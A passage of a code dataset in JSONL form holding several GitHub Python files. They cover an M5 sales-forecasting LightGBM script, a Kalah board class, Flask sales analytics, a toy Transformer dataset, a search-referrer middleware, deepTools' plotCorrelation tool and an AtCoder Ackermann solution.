col_dtype in PRICE_DTYPES.items():\n if col_dtype == \"category\":\n prices[col] = prices[col].cat.codes.astype(\"int16\")\n prices[col] -= prices[col].min()\n \n # calender \n cal = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/calendar.csv\", dtype = CAL_DTYPES)\n cal[\"date\"] = pd.to_datetime(cal[\"date\"])\n \n for col, col_dtype in CAL_DTYPES.items():\n if col_dtype == \"category\":\n cal[col] = cal[col].cat.codes.astype(\"int16\")\n cal[col] -= cal[col].min()\n \n start_day = max(1 if is_train else tr_last - max_lags, first_day)\n numcols = [f\"d_{day}\" for day in range(start_day,tr_last + 1)]\n \n catcols = ['id', 'item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n dtype = {numcol:\"float32\" for numcol in numcols} \n dtype.update({col: \"category\" for col in catcols if col != \"id\"})\n dt = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/sales_train_evaluation.csv\", \n nrows = nrows, usecols = catcols + numcols, dtype = dtype)\n \n # store ids\n #STORES_IDS = dt['dept_id']\n #STORES_IDS = list(STORES_IDS.unique())\n #store = STORES_IDS[store_num]\n #print(store)\n #dt = dt[dt['store_id'] == 'CA_1']\n \n # continue\n for col in catcols:\n if col != \"id\":\n dt[col] = dt[col].cat.codes.astype(\"int16\")\n dt[col] -= dt[col].min()\n \n if is_train == False:\n for day in range(tr_last + 1, tr_last + 28 + 1):\n dt[f\"d_{day}\"] = np.nan\n \n dt = pd.melt(dt,\n id_vars = catcols,\n value_vars = [col for col in dt.columns if col.startswith(\"d_\")],\n var_name = \"d\",\n value_name = \"sales\")\n \n dt = dt.merge(cal, on= \"d\", copy = False)\n dt = dt.merge(prices, on = [\"store_id\", \"item_id\", \"wm_yr_wk\"], copy = False)\n \n return dt\n\n\ndef create_fea(dt):\n \n lags_1 = [1, 2, 3, 7, 14, 21]\n \n lag_cols = [f\"lag_{lag}\" for lag in lags_1 ]\n for lag, lag_col in zip(lags_1, lag_cols):\n dt[lag_col] = dt[[\"id\",\"sales\"]].groupby(\"id\")[\"sales\"].shift(lag)\n \n lags_2 = [1, 2, 3, 7, 14]\n wins = [7, 28]\n for win in wins :\n for lag,lag_col in zip(lags_2, lag_cols):\n dt[f\"rmean_{lag}_{win}\"] = dt[[\"id\", 
lag_col]].groupby(\"id\")[lag_col].transform(lambda x : x.rolling(win).mean())\n \n #for lag in [7, 28]: # shift 1 day and std\n # dt['lag_1_' + 'std_' + str(lag)] = dt.groupby(['id'])['sales'].transform(lambda x: x.shift(1).rolling(lag).std()).astype(np.float16)\n \n #for lag in lags_1[:3]: # shop mean \n # dt['shop_lag_'+ str(lag) + '_mean' ] = dt.groupby(['store_id','d'])['lag_' + str(lag)].transform('mean').astype(np.float16)\n \n \n date_features = {\n \n \"wday\": \"weekday\",\n \"week\": \"weekofyear\",\n \"month\": \"month\",\n \"quarter\": \"quarter\",\n \"year\": \"year\",\n \"mday\": \"day\",\n }\n \n# dt.drop([\"d\", \"wm_yr_wk\", \"weekday\"], axis=1, inplace = True)\n \n for date_feat_name, date_feat_func in date_features.items():\n if date_feat_name in dt.columns:\n dt[date_feat_name] = dt[date_feat_name].astype(\"int16\")\n else:\n dt[date_feat_name] = getattr(dt[\"date\"].dt, date_feat_func).astype(\"int16\")\n \n dt['year'] = dt['year'] - 2011\n\n\ndf = create_dt(is_train=True, first_day= FIRST_DAY)\n\ncreate_fea(df)\n\ndf.dropna(inplace = True)\nprint(df.shape)\n \n#print(df['year'].unique())\n\n\n#gamma = 0.997\n#to_map = [pow(gamma,tr_last-i) for i in range(1,tr_last+1)]\n\nclass_mapping = {}\nfor i in range(1,tr_last+1):\n class_mapping['d_'+str(i)] = i\n #to_map = pow(gamma,tr_last-i)\n #class_mapping['d_'+str(i)] = pow(gamma,tr_last-i)\n \n \ndf['d'] = df['d'].map(class_mapping)\n\n#valid_data_last_days = df[df['d'] > 1850]\n# use weight as log(passed day)\ndf['d'] = df['d'].apply(np.log)\n#df['d'] = df['d']\n#print(df['d'].unique())\nw = df['d']/df['d'].max()\n\n#print(valid_data_last_days.shape)\n\ncat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id'] + [\"event_name_1\", \"event_name_2\", \"event_type_1\", \"event_type_2\"]\nuseless_cols = [\"id\", \"date\", \"sales\",\"d\", \"wm_yr_wk\", \"weekday\"]\ntrain_cols = df.columns[~df.columns.isin(useless_cols)]\n\n#df.to_pickle('data/train_data.pkl')\n\n\nX_train = df[train_cols]\ny_train = df[\"sales\"]\n\n\n\n#valid_data_last_days_train = valid_data_last_days[train_cols]\n#valid_data_last_days_ytrain = valid_data_last_days['sales']\n\n######################\n#use_model = 'lgb'\n######################\n\n#np.random.seed(666)\n#num_rounds = 1000\n\nfake_valid_inds = np.random.choice(X_train.index.values, 2000000, replace = False)\ntrain_inds = np.setdiff1d(X_train.index.values, fake_valid_inds)\n\n\n\ntrain_data = lgb.Dataset(X_train.loc[train_inds] , label = y_train.loc[train_inds], \n categorical_feature=cat_feats, free_raw_data=False,weight = w.loc[train_inds])\n\nfake_valid_data = lgb.Dataset(X_train.loc[fake_valid_inds], label = y_train.loc[fake_valid_inds],\n categorical_feature=cat_feats,#weight = w.loc[fake_valid_inds],\n free_raw_data = False)# This is a random sample, we're not gonna apply any time series train-test-split tricks here!\n\n#fake_valid_data = lgb.Dataset(valid_data_last_days_train, label = valid_data_last_days_ytrain,\n# categorical_feature=cat_feats,#weight = w.loc[fake_valid_inds],\n# free_raw_data = False)\n\ndel df, X_train, y_train, fake_valid_inds,train_inds ; gc.collect()\n\n\nparams = {\n #\"objective\" : \"poisson\",\n 'objective': 'tweedie',\n 'tweedie_variance_power': 1.2,\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.04,\n \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.01,\n# \"nthread\" : 4\n 'verbosity': 1,\n 'num_iterations' : 2000,\n 'num_leaves': 384,\n \"min_data_in_leaf\": 128,\n 
#'min_child_weight': 5\n}\n\n\n\nm_lgb = lgb.train(params, train_data, \n valid_sets = [fake_valid_data],\n verbose_eval=20) \n\n\n\nmodel_name = 'lgb_model_tw12_lr004_n1200'\n\nm_lgb.save_model(\"lgb_models/\" + model_name + \".lgb\")\nprint('model saved')\n\n\n\n##############################################################################\n\nm_lgb = lgb.Booster(model_file=\"lgb_models/\" + model_name + \".lgb\")\nprint('model loaded')\n\n#alphas = [1.00]\n#weights = [1/len(alphas)]*len(alphas)\n#sub = 0.\n\n#for icount, (alpha, weight) in enumerate(zip(alphas, weights)):\n\ntemp_df = create_dt(is_train = False)\ncols = [f\"F{i}\" for i in range(1,29)]\n\nfor tdelta in range(0, 28):\n day = fday + timedelta(days=tdelta)\n print(tdelta, day)\n test_df = temp_df[(temp_df.date >= day - timedelta(days=max_lags)) & (temp_df.date <= day)].copy()\n create_fea(test_df)\n test_df = test_df.loc[test_df.date == day , train_cols]\n temp_df.loc[temp_df.date == day, \"sales\"] = m_lgb.predict(test_df) # magic multiplier by kyakovlev\n\n\nsub = temp_df.loc[temp_df.date >= fday, [\"id\", \"sales\"]].copy()\nsub_prev = temp_df.loc[temp_df.date.isin(fday_prev_list), [\"id\", \"sales\"]].copy()\n# te_sub.loc[te.date >= fday+ timedelta(days=h), \"id\"] = te_sub.loc[te.date >= fday+timedelta(days=h), \n# \"id\"].str.replace(\"validation$\", \"evaluation\")\ndef finalOutput(sub):\n sub[\"F\"] = [f\"F{rank}\" for rank in sub.groupby(\"id\")[\"id\"].cumcount()+1]\n sub = sub.set_index([\"id\", \"F\" ]).unstack()[\"sales\"][cols].reset_index()\n sub.fillna(0., inplace = True)\n sub.sort_values(\"id\", inplace = True)\n sub.reset_index(drop=True, inplace = True)\n sub.to_csv(f\"submission_{0}.csv\",index=False)\n return sub\n #if icount == 0 :\n # sub = te_sub\n # sub[cols] *= weight\n #else:\n # sub[cols] += te_sub[cols]*weight\n #print(icount, alpha, weight)\nsub_prev = finalOutput(sub_prev)\nsub = finalOutput(sub)\nsub_prev[\"id\"] = sub_prev[\"id\"].str.replace(\"evaluation$\", \"validation\")\nsub = pd.concat([sub_prev, sub], axis=0, sort=False)\nsub.to_csv(\"submission_new.csv\",index=False)\n#sub2 = sub.copy()\n#sub2[\"id\"] = sub2[\"id\"].str.replace(\"validation$\", \"evaluation\")\n#sub = pd.concat([sub, sub2], axis=0, sort=False)\n#sub.to_csv(\"submission_new.csv\",index=False)\n\n\n","repo_name":"danqingpan/Kaggle","sub_path":"M5-sales-prediction/model training/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70758471260","text":"from abkalah import NORTH, SOUTH\n\nclass Board:\n def __init__(self, board = [7] * 7 + [0] + [7] * 7 + [0]):\n self.state = board\n\n def move(self, move, first_turn = False):\n moved_board = [ i for i in self.state ]\n\n player = NORTH if move < 7 else SOUTH\n opponent = NORTH if player == SOUTH else SOUTH\n\n next_player = opponent\n\n stones = moved_board[move]\n moved_board[move] = 0\n\n # game end check\n if not self.has_moves(player):\n if player == NORTH:\n for i in range(8, 15):\n moved_board[15] += moved_board[i]\n moved_board[i] = 0\n else:\n for i in range(0, 7):\n moved_board[7] += moved_board[i]\n moved_board[i] = 0\n \n return Board(moved_board), opponent\n\n while stones > 0:\n # update next move\n move = (move + 1) % 16\n\n # don't add to opponent's well\n if player == NORTH and move == 15:\n move = 0\n elif player == SOUTH and move == 7:\n move = 8\n \n moved_board[move] += 1\n stones -= 1\n \n # check if the previous bowl was empty and capture opponent's\n if moved_board[move] == 1:\n opposite_well = 14 - move\n\n if player == NORTH and move < 7 and moved_board[opposite_well] > 0:\n moved_board[7] += moved_board[opposite_well] + 1\n moved_board[opposite_well] = 0\n moved_board[move] = 0\n elif player == SOUTH and move > 7 and move != 15 and moved_board[opposite_well] > 0:\n moved_board[15] += moved_board[opposite_well] + 1\n moved_board[opposite_well] = 0\n moved_board[move] = 0\n\n # check if stone was placed inside the player's own well\n if not first_turn and ((player == NORTH and move == 7) or (player == SOUTH and move == 15)):\n next_player = player\n \n return Board(moved_board), next_player\n\n def has_moves(self, player):\n if player == NORTH:\n for i in range(0,7):\n if self.state[i] > 0:\n return True\n else:\n for i in range(8, 15):\n if self.state[i] > 0:\n return True\n\n return False\n\n def available_moves(self, player):\n moves = []\n\n if player == NORTH:\n for i in range(0,7):\n if self.state[i] > 0:\n moves.append(i)\n else:\n for i in range(8, 15):\n if self.state[i] > 0:\n moves.append(i)\n\n return moves\n \n def is_end(self, player):\n if player == NORTH:\n for i in range(0, 7):\n if self.state[i] > 0: return False\n\n else:\n for i in range(8, 15):\n if self.state[i] > 0: return False\n\n return True\n\n def count_stones(self, player):\n sum = 0\n\n if player == NORTH:\n for i in range(0, 8):\n sum += self.state[i]\n else:\n for i in range(8, 16):\n sum += self.state[i]\n\n return sum\n\n def get_free_turns_for_player(self, player):\n count = 0\n\n if player == NORTH:\n for i in range(0, 7):\n if self.state[i] == (7 - i):\n count += 1\n else:\n for i in range(8, 15):\n if self.state[i] == (15 - i):\n count += 1\n\n return count\n \n def __str__(self):\n return str([ self.state[0:7], self.state[7], self.state[8:15], self.state[15] ])\n","repo_name":"jevvk/ai-coursework","sub_path":"abkalah/game/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21706292359","text":"from flask_package.models import Inventory, Sales, Transaction\n# from datetime import date, datetime, timedelta\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\n\ndef t_income():\n income = 0\n all_sales = Sales.query.all()\n for sale in all_sales:\n income += sale.t_price\n return income\n\n\ndef t_investment():\n investment = 0\n all_inv = Inventory.query.all()\n for inv in all_inv:\n investment += inv.t_price\n return investment\n\n\ndef t_inv_remaining():\n remaining = 0\n all_inv = Inventory.query.filter(Inventory.remaining > 0).order_by(Inventory.id.desc())\n for inv in all_inv:\n remaining += inv.remaining\n return remaining\n\n\ndef remain_cash():\n cash_out = 0\n transactions = Transaction.query.all()\n for trans in transactions:\n cash_out += trans.amount\n cash = t_income() - cash_out\n return cash\n\n\ndef operation_cost():\n cost = 0\n transactions = Transaction.query.filter_by(type=2).all()\n for trans in transactions:\n cost += trans.amount\n return cost\n\n\ndef trans_type_one():\n cost = 0\n transactions = Transaction.query.filter_by(type=1).all()\n for trans in transactions:\n cost += trans.amount\n return cost\n\n\ndef PL():\n return t_income() - t_investment() - operation_cost()\n\n\ndef month_sale(x,y=0):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=y,days=day),\n datetime.time(0, 0))\n else:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Sales.query.filter(Sales.date > date1).filter(Sales.date <= date2)\n return trans\n\n\ndef month_income(x, y):\n income = 0\n sales = month_sale(x, y)\n for sale in sales:\n income += sale.t_price\n return income\n\n\ndef month_trans(x):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(days=day),\n datetime.time(0, 0))\n else:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Transaction.query.filter(Sales.date > date1).filter(Sales.date <= date2)\n return trans\n\n\ndef month_trans_amount(x):\n amount = 0\n transactions = month_trans(x)\n for trans in transactions:\n amount += trans.amount\n return amount\n\n\ndef month_inv(x, y):\n day = datetime.datetime.now().day\n if x != 0:\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=y, days=day),\n datetime.time(0, 0))\n else:\n\n date1 = datetime.datetime.combine(datetime.date.today() - relativedelta(months=x, days=day),\n datetime.time(0, 0))\n\n date2 = datetime.datetime.combine(datetime.date.today(),\n datetime.time(0, 0))\n\n # print(date1, date2)\n trans = Inventory.query.filter(Inventory.date > date1).filter(Inventory.date <= date2)\n return trans\n\n\ndef month_inv_amount(x, y):\n amount = 0\n investment = 
month_inv(x, y)\n\n for inv in investment:\n amount += inv.t_price\n # print(x, y, amount)\n return amount\n\n\n","repo_name":"LongZhai/flask","sub_path":"flask_package/d_analysis.py","file_name":"d_analysis.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22402496693","text":"import torch\nfrom torch.utils.data import DataLoader,Dataset\n\n\n\nclass Vocabulary:\n def __init__(self):\n self.freeze = False\n self.word2index = {}\n self.index2word = {}\n self.dict_size = 0\n\n @property\n def dict_size_(self):\n return self.dict_size\n\n def index(self, word):\n if not self.freeze:\n if word in self.word2index:\n return self.word2index[word]\n else:\n self.word2index[word] = self.dict_size\n self.index2word[self.dict_size] = word\n self.dict_size += 1\n return self.word2index[word]\n else:\n if word in self.word2index:\n return self.word2index[word]\n else:\n raise ValueError('Word is not in this dictionary ! ')\n\n def word(self, index):\n assert index < self.dict_size and index >= 0, f\"index is out of the dict_size({self.dict_size})\"\n return self.index2word[index]\n\n\n def freeze_(self):\n self.freeze = True\n\nclass MyDataset(Dataset):\n def __init__(self,text,vocab):\n super(MyDataset, self).__init__()\n self.vocab = vocab\n self.text = text\n self.enc_input,self.dec_input,self.dec_output = self.get_index(text)\n\n def __len__(self):\n return len(self.text)\n\n def __getitem__(self, item):\n return self.enc_input[item],self.dec_input[item],self.dec_output[item]\n\n\n def get_index(self,text):\n enc_inputs,dec_inputs,dec_outputs = [],[],[]\n for sentences in text:\n enc_input = [[ self.vocab.index(w) for w in sentences[0].split(' ')]]\n dec_input = [[ self.vocab.index(w) for w in sentences[1].split(' ')]]\n dec_output = [[ self.vocab.index(w) for w in sentences[2].split(' ')]]\n\n enc_inputs.extend(enc_input)\n dec_inputs.extend(dec_input)\n dec_outputs.extend(dec_output)\n\n return torch.LongTensor(enc_inputs),torch.LongTensor(dec_inputs),torch.LongTensor(dec_outputs)\n\n\n\n\n# only for test\n\n# S: Symbol that shows starting of decoding input\n# E: Symbol that shows starting of decoding output\n# P: Symbol that will fill in blank sequence if current batch data size is short than time steps\n# dec_input is the shifted right dec_output\nsentences = [\n # enc_input dec_input dec_output\n ['ich mochte ein bier P', 'S i want a beer .', 'i want a beer . E'],\n ['ich mochte ein cola P', 'S i want a coke .', 'i want a coke . E']\n]\n\n\n# create the dictionary\nvocabulary = Vocabulary()\nvocabulary.index('P') #Padding should be zero\nvocabulary.index('S')\nvocabulary.index('E')\n\nfor sen in sentences:\n for s in sen:\n for word in s.split(' '):\n vocabulary.index(word)\n\nvocabulary.freeze_()\n\ndataset = MyDataset(text=sentences,vocab=vocabulary)\ndataloader = DataLoader(dataset,batch_size=2,drop_last=False)\n\n","repo_name":"leaves520/NLP-practice","sub_path":"Transformer/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"73624707739","text":"from itertools import chain\nfrom string import ascii_lowercase, ascii_uppercase\n\ndef into_rucksacks(contents):\n middle = len(contents) // 2\n return (contents[:middle], contents[middle:])\n\ndef find_common_item(xs, ys):\n for x in xs:\n for y in ys:\n if x == y:\n return x\n\n# dictionary mapping a letter to its assigned priority\npriority_by_letter = dict(map(reversed, enumerate(chain(ascii_lowercase, ascii_uppercase), start=1)))\n\nwith open(\"input.txt\") as f:\n data = f.readlines()\n\nrucksacks = map(into_rucksacks, data)\ncommon_items = [find_common_item(xs, ys) for (xs, ys) in rucksacks]\npriorities = map(priority_by_letter.get, common_items)\npriority_sum = sum(priorities)\nprint(priority_sum)\n","repo_name":"dmarku/advent-of-code-2022","sub_path":"day-03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15858678896","text":"import urlparse\nimport re\n\n\nclass AramaMotorlariMiddleware( object ):\n\t\"\"\"\n\trequest.search_referrer_engine\n\trequest.search_referrer_domain\n\trequest.search_referrer_term\n\n\tUsage example:\n\t==============\n\tShow ads only to visitors coming from a searh engine\n\n\t{% if request.search_referrer_engine %}\n\t\thtml for ads...\n\t{% endif %}\n\t\"\"\"\n\tSEARCH_PARAMS = { 'AltaVista': 'q', 'Ask': 'q', 'Google': 'q', 'Live': 'q', 'Lycos': 'query', 'MSN': 'q', 'Yahoo': 'p', 'Cuil': 'q', }\n\n\tNETWORK_RE = r\"\"\"^\n (?P[-.a-z\\d]+\\.)?\n (?P%s)\n (?P(?:\\.[a-z]{2,3}){1,2})\n (?P:\\d+)?\n $(?ix)\"\"\"\n\n\n\n\t@classmethod\n\tdef parse_search( cls, url ):\n\t\ttry:\n\t\t\tparsed = urlparse.urlsplit( url )\n\t\t\tnetwork = parsed[1]\n\t\t\tquery = parsed[3]\n\t\texcept (AttributeError, IndexError):\n\t\t\treturn (None, None, None)\n\t\tfor engine, param in cls.SEARCH_PARAMS.iteritems( ):\n\t\t\tmatch = re.match( cls.NETWORK_RE % engine, network )\n\t\t\tif match and match.group( 2 ):\n\t\t\t\tterm = urlparse.parse_qs( query ).get( param )\n\t\t\t\tif term and term[0]:\n\t\t\t\t\tterm = ' '.join( term[0].split( ) ).lower( )\n\t\t\t\t\treturn (engine, network, term)\n\t\treturn (None, network, None)\n\n\n\n\tdef process_request( self, request ):\n\t\treferrer = request.META.get( 'HTTP_REFERER' )\n\t\tengine, domain, term = self.parse_search( referrer )\n\t\trequest.search_referrer_engine = engine\n\t\trequest.search_referrer_domain = domain\n\t\trequest.search_referrer_term = term\n","repo_name":"muslu/teslabb","sub_path":"kategoriler/aramamotorlari.py","file_name":"aramamotorlari.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"36783578270","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nfrom deeptools import cm # noqa: F401\nimport matplotlib.pyplot as plt\n\nfrom deeptools.correlation import Correlation\nfrom deeptools.parserCommon import writableFile\ntry: # keep python 3.7 support.\n from importlib.metadata import version\nexcept ModuleNotFoundError:\n from importlib_metadata import version\n\nold_settings = np.seterr(all='ignore')\n\n\ndef parse_arguments(args=None):\n basic_args = plot_correlation_args()\n heatmap_parser = heatmap_options()\n scatter_parser = scatterplot_options()\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nTool for the analysis and visualization of sample correlations based on the output of multiBamSummary or\nmultiBigwigSummary. Pearson or Spearman methods are available to compute correlation\ncoefficients. Results can be saved as multiple\nscatter plots depicting the pairwise correlations or as a clustered heatmap,\nwhere the colors represent the correlation coefficients and the clusters are constructed using complete linkage.\nOptionally, the values can be saved as tables, too.\n\n\ndetailed help:\n\n plotCorrelation -h\n\n\"\"\",\n epilog='example usages:\\n'\n 'plotCorrelation -in results_file --whatToPlot heatmap --corMethod pearson -o heatmap.png\\n\\n'\n ' \\n\\n',\n parents=[basic_args, heatmap_parser, scatter_parser],\n usage='plotCorrelation -in matrix.gz -c spearman -p heatmap -o plot.png\\n'\n 'help: plotCorrelation -h / plotCorrelation --help\\n')\n\n return parser\n\n\ndef plot_correlation_args():\n parser = argparse.ArgumentParser(add_help=False)\n required = parser.add_argument_group('Required arguments')\n\n # define the arguments\n required.add_argument('--corData', '-in',\n metavar='FILE',\n help='Compressed matrix of values generated by multiBigwigSummary or multiBamSummary',\n required=True)\n\n required.add_argument('--corMethod', '-c',\n help=\"Correlation method.\",\n choices=['spearman', 'pearson'],\n required=True)\n\n required.add_argument('--whatToPlot', '-p',\n help=\"Choose between a heatmap or pairwise scatter plots\",\n choices=['heatmap', 'scatterplot'],\n required=True)\n\n optional = parser.add_argument_group('Optional arguments')\n optional.add_argument('--plotFile', '-o',\n help='File to save the heatmap to. The file extension determines the format, '\n 'so heatmap.pdf will save the heatmap in PDF format. '\n 'The available formats are: .png, '\n '.eps, .pdf and .svg.',\n type=writableFile,\n metavar='FILE')\n\n optional.add_argument('--skipZeros',\n help='By setting this option, genomic regions '\n 'that have zero or missing (nan) values in all samples '\n 'are excluded.',\n action='store_true',\n required=False)\n\n optional.add_argument('--labels', '-l',\n metavar='sample1 sample2',\n help='User defined labels instead of default labels from '\n 'file names. '\n 'Multiple labels have to be separated by spaces, e.g. '\n '--labels sample1 sample2 sample3',\n nargs='+')\n\n optional.add_argument('--plotTitle', '-T',\n help='Title of the plot, to be printed on top of '\n 'the generated image. Leave blank for no title. (Default: %(default)s)',\n default='')\n\n optional.add_argument('--plotFileFormat',\n metavar='FILETYPE',\n help='Image format type. 
If given, this option '\n 'overrides the image format based on the plotFile '\n 'ending. The available options are: png, '\n 'eps, pdf and svg.',\n choices=['png', 'pdf', 'svg', 'eps', 'plotly'])\n\n optional.add_argument(\n '--removeOutliers',\n help='If set, bins with very large counts are removed. '\n 'Bins with abnormally high reads counts artificially increase '\n 'pearson correlation; that\\'s why, multiBamSummary tries '\n 'to remove outliers using the median absolute deviation (MAD) '\n 'method applying a threshold of 200 to only consider extremely '\n 'large deviations from the median. The ENCODE blacklist page '\n '(https://sites.google.com/site/anshulkundaje/projects/blacklists) '\n 'contains useful information about regions with unusually high counts'\n 'that may be worth removing.',\n action='store_true')\n\n optional.add_argument('--version', action='version',\n version='%(prog)s {}'.format(version('deeptools')))\n\n group = parser.add_argument_group('Output optional options')\n\n group.add_argument('--outFileCorMatrix',\n help='Save matrix with pairwise correlation values to a tab-separated file.',\n metavar='FILE',\n type=writableFile)\n\n return parser\n\n\ndef scatterplot_options():\n \"\"\"\n Options specific for creating the scatter plot\n \"\"\"\n parser = argparse.ArgumentParser(add_help=False)\n scatter_opts = parser.add_argument_group('Scatter plot options')\n\n scatter_opts.add_argument('--xRange',\n help='The X axis range. The default scales these such that the full range of dots is displayed.',\n type=int,\n nargs=2,\n default=None)\n\n scatter_opts.add_argument('--yRange',\n help='The Y axis range. The default scales these such that the full range of dots is displayed.',\n type=int,\n nargs=2,\n default=None)\n\n scatter_opts.add_argument('--log1p',\n help='Plot the natural log of the scatter plot after adding 1. Note that this is ONLY for plotting, the correlation is unaffected.',\n action='store_true')\n\n return parser\n\n\ndef heatmap_options():\n \"\"\"\n Options for generating the correlation heatmap\n \"\"\"\n parser = argparse.ArgumentParser(add_help=False)\n heatmap = parser.add_argument_group('Heatmap options')\n\n heatmap.add_argument('--plotHeight',\n help='Plot height in cm. (Default: %(default)s)',\n type=float,\n default=9.5)\n\n heatmap.add_argument('--plotWidth',\n help='Plot width in cm. The minimum value is 1 cm. (Default: %(default)s)',\n type=float,\n default=11)\n\n heatmap.add_argument('--zMin', '-min',\n default=None,\n help='Minimum value for the heatmap intensities. '\n 'If not specified, the value is set automatically',\n type=float)\n\n heatmap.add_argument('--zMax', '-max',\n default=None,\n help='Maximum value for the heatmap intensities.'\n 'If not specified, the value is set automatically',\n type=float)\n\n heatmap.add_argument(\n '--colorMap', default='jet',\n metavar='',\n help='Color map to use for the heatmap. Available values can be '\n 'seen here: '\n 'http://matplotlib.org/examples/color/colormaps_reference.html')\n\n heatmap.add_argument('--plotNumbers',\n help='If set, then the correlation number is plotted '\n 'on top of the heatmap. 
This option is only valid when plotting a heatmap.',\n action='store_true',\n required=False)\n\n return parser\n\n\ndef main(args=None):\n\n args = parse_arguments().parse_args(args)\n\n if args.plotFile is None and args.outFileCorMatrix is None:\n sys.exit(\"At least one of --plotFile and --outFileCorMatrix must be specified!\\n\")\n\n corr = Correlation(args.corData,\n args.corMethod,\n labels=args.labels,\n remove_outliers=args.removeOutliers,\n skip_zeros=args.skipZeros)\n\n if args.corMethod == 'pearson':\n # test if there are outliers and write a message recommending the removal\n if len(corr.get_outlier_indices(np.asarray(corr.matrix).flatten())) > 0:\n if args.removeOutliers:\n sys.stderr.write(\"\\nOutliers were detected in the data. They \"\n \"will be removed to avoid bias \"\n \"in the pearson correlation.\\n\")\n\n else:\n sys.stderr.write(\"\\nOutliers were detected in the data. Consider \"\n \"using the --removeOutliers parameter to avoid a bias \"\n \"in the pearson correlation.\\n\")\n\n if args.colorMap:\n try:\n plt.get_cmap(args.colorMap)\n except ValueError as error:\n sys.stderr.write(\n \"A problem was found. Message: {}\\n\".format(error))\n exit()\n\n if args.plotFile is not None:\n if args.whatToPlot == 'scatterplot':\n corr.plot_scatter(args.plotFile,\n plot_title=args.plotTitle,\n image_format=args.plotFileFormat,\n xRange=args.xRange,\n yRange=args.yRange,\n log1p=args.log1p)\n else:\n corr.plot_correlation(args.plotFile,\n vmax=args.zMax,\n vmin=args.zMin,\n colormap=args.colorMap,\n plot_title=args.plotTitle,\n image_format=args.plotFileFormat,\n plot_numbers=args.plotNumbers,\n plotWidth=args.plotWidth,\n plotHeight=args.plotHeight)\n\n if args.outFileCorMatrix:\n o = open(args.outFileCorMatrix, \"w\")\n o.write(\"#plotCorrelation --outFileCorMatrix\\n\")\n corr.save_corr_matrix(o)\n o.close()\n","repo_name":"deeptools/deepTools","sub_path":"deeptools/plotCorrelation.py","file_name":"plotCorrelation.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"69"}
+{"seq_id":"3996696191","text":"# https://atcoder.jp/contests/kupc2012pr/tasks/kupc2012pr_1\r\n\r\nimport sys\r\nsys.setrecursionlimit(10**6)\r\n\r\nm, n = map(int, input().split())\r\n\r\ndef a(m, n):\r\n \"\"\"\r\n アッカーマン関数\r\n m <= 3, n <= 60\r\n \"\"\"\r\n if m == 0:\r\n return n + 1\r\n if m == 1:\r\n return n + 2\r\n if m == 2:\r\n return 2*n + 3\r\n if m == 3:\r\n return pow(2, n+3) - 3\r\n\r\nprint(a(m, n))\r\n","repo_name":"Hironobu-Kawaguchi/atcoder","sub_path":"atcoder/kupc2012pr_1.py","file_name":"kupc2012pr_1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
